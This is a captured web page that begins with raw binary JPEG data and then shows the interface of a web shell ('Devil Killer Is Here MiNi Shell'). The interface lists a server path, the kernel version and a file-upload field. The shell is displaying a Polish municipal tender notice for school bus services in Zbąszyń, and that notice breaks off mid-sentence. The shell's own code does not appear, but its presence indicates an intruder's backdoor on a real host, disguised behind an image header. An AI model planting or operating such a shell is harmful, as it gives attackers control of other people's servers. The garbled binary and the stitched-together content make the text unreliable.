JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210729/0013147701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00131477 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> DOWOZY UCZNIÓW DO PLACÓWEK OŚWIATOWYCH NA TERENIE GMINY ZBĄSZYŃ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH W ZBĄSZYNIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 369064741</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Porucznika Żwirki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zbąszyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-360</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 3866 009</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">68 3846 010</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zbaszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zbaszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOWOZY UCZNIÓW DO PLACÓWEK OŚWIATOWYCH NA TERENIE GMINY ZBĄSZYŃ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c3070ee-f064-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00131477</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001734/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowozy uczniów do placówek oświatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.zbaszyn.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bip.zbaszyn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. Zasady korzystania z miniPortalu oraz opis wymagań technicznych zawarte są w rozdziale IX SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.bip.zbaszyn.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> Administratorem danych osobowych jest Centrum Usług Wspólnych w Zbąszyniu ul. por. Żwirki 1, 64-360 Zbąszyń, reprezentowane przez Dyrektora<br/> inspektorem ochrony danych osobowych jest Pan Paweł Pogorzelski, inspektordanychosobowych@gmail.com 888050176;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą Dowozy uczniów do placówek oświatowych na terenie gminy Zbąszyń prowadzonym w trybie podstawowym bez negocjacji;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej „ustawa Pzp”;<br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.271.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 304761,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi polegające na dowożeniu i odwożeniu uczniów Zespołu Szkolno – Przedszkolnego w Przyprostyni, Zespołu Szkolno – Przedszkolnego w Nądni i Zespołu Szkolno – Przedszkolnego w Chrośnicy w roku szkolnym 2021/2022.<br/>1.1. Realizacja dowozów będzie wykonywana w okresie od dnia 1 września 2021r. do dnia 24 czerwca 2022r. w dni nauki szkolnej zgodnie z harmonogramem ustalonym z dyrektorami placówek.<br/>1.2. Trasa będzie ustalona w obrębie miejscowości: Chrośnica, Stefanowice, Łomnica, Nądnia, Nowa Wieś, Nowa Wieś Zbąska, Przyprostynia, Perzyny, Stefanowo, Zakrzewko.<br/>1.3. W zakresie usługi będzie realizowane dowożenie uczniów na zajęcia wychowania fizycznego odbywające się w hali sportowej w Zbąszyniu oraz w Przyprostyni.<br/>1.4. Szacunkowa średnia dzienna liczba kilometrów wynosi: ok. 180 km (dokładna trasa i liczba kilometrów zostanie określona po ustaleniu planu zajęć dla uczniów). Długość trasy może ulec zmianie z powodów niezależnych od Zamawiającego.<br/>1.5. Wymagany pojazd do przewozu min. 55 osób.<br/>1.6. Przewidywana ilość dni wykonywania usługi: 196.<br/>1.7. Przewiduje się możliwość przejazdów uczniów (w ramach obowiązkowych zajęć lub w ramach wykonywania zadań statutowych szkół) na zajęcia dodatkowe, zawody, warsztaty, itp., które nie spowodują przekroczenia kwoty wynagrodzenia określonej w umowie.<br/>1.8. Wykonawca jest zobowiązany do wykonywania zadania sprawnym technicznie pojazdem każdego dnia nauki szkolnej oraz zapewnienia opieki przewożonym uczniom. Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny w trakcie wsiadania, wysiadania i przejazdu dzieci i uczniów autobusem, a także na zewnątrz pojazdu (po jego zatrzymaniu) przy przechodzeniu uczniów przez jezdnię. Kierowca nie może być jednocześnie opiekunem.<br/>1.9. Pojazd musi posiadać miejsca siedzące dla wszystkich przewożonych uczniów. Pojazd musi posiadać oznakowanie dla przewozu dzieci i młodzieży zgodne z obowiązującymi przepisami.<br/>1.10. W przypadku awarii pojazdu przewożącego uczniów, Wykonawca zobowiązany jest zapewnić transport pojazdem zastępczym spełniającym wymagania określone w postępowaniu.<br/>2. Ilość dni i ilość kilometrów została podana w celu wyliczenia ceny oferty i ta wartość będzie przyjęta do oceny ofert. Rozliczenie będzie odbywało się za faktyczne ilości dni i ilości przejechanych kilometrów, według podanej w ofercie ceny jednostkowej za 1 km.<br/>Zamawiający dopuszcza zmniejszenie lub zwiększenie świadczenia usługi w przypadku zmiany liczby dowożonych uczniów, zmiany trasy przewozów, itp. Ze względu na specyfikę usług, rozmiar przedmiotu zamówienia został określony szacunkowo. Rzeczywista ilość usług może ulec zmianie, przy czym Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli ilość ta będzie mniejsza niż szacowana.<br/>3. Na podstawie art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, osób wykonujących usługi objęte przedmiotem zamówienia: kierowców i opiekunów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Przewiduje się możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług na warunkach określonych w zamówieniu podstawowym, w trybie przewidzianym w art. 214 ust. 1 pkt 7 ustawy Pzp, jeżeli spełnione zostaną przesłanki tam określone, przy zachowaniu cen jednostkowych, oferowanych w zamówieniu podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: łączna cena ofertowa brutto (C) oraz termin płatności faktury (T).<br/>2. Całkowita liczba punktów (L), jaką otrzyma dana oferta, zostanie obliczona wg wzoru: L = C + T.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>4. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>5. Ocena ofert będzie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi polegające na dowożeniu i odwożeniu uczniów Zespołu Szkolno – Przedszkolnego w Chrośnicy w roku szkolnym 2021/2022.<br/>1.1. Realizacja dowozów będzie wykonywana w okresie od dnia 1 września 2021r. do dnia 24 czerwca 2022r. w dni nauki szkolnej zgodnie z harmonogramem ustalonym z dyrektorem placówki.<br/>1.2. Trasa będzie ustalona w obrębie miejscowości: Przychodzko, Nowe Jastrzębsko, Stefanowice, Chrośnica, Łomnica.<br/>1.3. Szacunkowa średnia dzienna liczba kilometrów wynosi: ok. 120 km (dokładna trasa i liczba kilometrów zostanie określona po ustaleniu planu zajęć dla uczniów). Długość trasy może ulec zmianie z powodów niezależnych od Zamawiającego.<br/>1.4. Wymagany pojazd do przewozu min. 8 osób.<br/>1.5. Przewidywana ilość dni wykonywania usługi: 196.<br/>1.6. Przewiduje się możliwość przejazdów uczniów (w ramach obowiązkowych zajęć lub w ramach wykonywania zadań statutowych szkół) na zajęcia dodatkowe, zawody, warsztaty, itp., które nie spowodują przekroczenia kwoty wynagrodzenia określonej w umowie.<br/>1.7. Wykonawca jest zobowiązany do wykonywania zadania sprawnym technicznie pojazdem każdego dnia nauki szkolnej oraz zapewnienia opieki przewożonym uczniom. Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny w trakcie wsiadania, wysiadania i przejazdu dzieci i uczniów autobusem, a także na zewnątrz pojazdu (po jego zatrzymaniu) przy przechodzeniu uczniów przez jezdnię. Kierowca nie może być jednocześnie opiekunem.<br/>1.8. Wykonawca, z którym Zamawiający podpisze umowę na realizację usługi musi posiadać zezwolenie na wykonywanie przewozów regularnych specjalnych.<br/>1.9. Pojazd musi posiadać miejsca siedzące dla wszystkich przewożonych uczniów. Pojazd musi posiadać oznakowanie dla przewozu dzieci i młodzieży zgodne z obowiązującymi przepisami.<br/>1.10. W przypadku awarii pojazdu przewożącego uczniów, Wykonawca zobowiązany jest zapewnić transport pojazdem zastępczym spełniającym wymagania określone w postępowaniu.<br/>2. Ilość dni i ilość kilometrów została podana w celu wyliczenia ceny oferty i ta wartość będzie przyjęta do oceny ofert. Rozliczenie będzie odbywało się za faktyczne ilości dni i ilości przejechanych kilometrów, według podanej w ofercie ceny jednostkowej za 1 km.<br/>Zamawiający dopuszcza zmniejszenie lub zwiększenie świadczenia usługi w przypadku zmiany liczby dowożonych uczniów, zmiany trasy przewozów, itp. Ze względu na specyfikę usług, rozmiar przedmiotu zamówienia został określony szacunkowo. Rzeczywista ilość usług może ulec zmianie, przy czym Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli ilość ta będzie mniejsza niż szacowana.<br/>3. Na podstawie art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, osób wykonujących usługi objęte przedmiotem zamówienia: kierowców i opiekunów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Przewiduje się możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług na warunkach określonych w zamówieniu podstawowym, w trybie przewidzianym w art. 214 ust. 1 pkt 7 ustawy Pzp, jeżeli spełnione zostaną przesłanki tam określone, przy zachowaniu cen jednostkowych, oferowanych w zamówieniu podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: łączna cena ofertowa brutto (C) oraz termin płatności faktury (T).<br/>2. Całkowita liczba punktów (L), jaką otrzyma dana oferta, zostanie obliczona wg wzoru: L = C + T.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>4. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>5. Ocena ofert będzie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi polegające na dowożeniu i odwożeniu uczniów Szkoły Podstawowej w Zbąszyniu w roku szkolnym 2021/2022.<br/>1.1. Realizacja dowozów będzie wykonywana w okresie od dnia 1 września 2021r. do dnia 24 czerwca 2022r. w dni nauki szkolnej zgodnie z harmonogramem ustalonym z dyrektorem placówki.<br/>1.2. Trasa będzie ustalona w obrębie miejscowości: Nowy Dwór (w tym Leśne Domki), Strzyżewo, Zbąszyń.<br/>1.3. Szacunkowa średnia dzienna liczba kilometrów wynosi: ok. 82 km (dokładna trasa i liczba kilometrów zostanie określona po ustaleniu planu zajęć dla uczniów). Długość trasy może ulec zmianie z powodów niezależnych od Zamawiającego.<br/>1.4. Wymagane pojazdy:<br/>- jeden pojazd do przewozu min. 6 osób (kursy dotyczące dowozu uczniów z Leśnych Domków),<br/>- jeden pojazd do przewozu min. 30 osób (pozostałe kursy).<br/>1.5. Przewidywana ilość dni wykonywania usługi: 196.<br/>1.6. Przewiduje się możliwość przejazdów uczniów (w ramach obowiązkowych zajęć lub w ramach wykonywania zadań statutowych szkół) na zajęcia dodatkowe, zawody, warsztaty, itp., które nie spowodują przekroczenia kwoty wynagrodzenia określonej w umowie.<br/>1.7. Wykonawca jest zobowiązany do wykonywania zadania sprawnym technicznie pojazdem każdego dnia nauki szkolnej oraz zapewnienia opieki przewożonym uczniom. Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny w trakcie wsiadania, 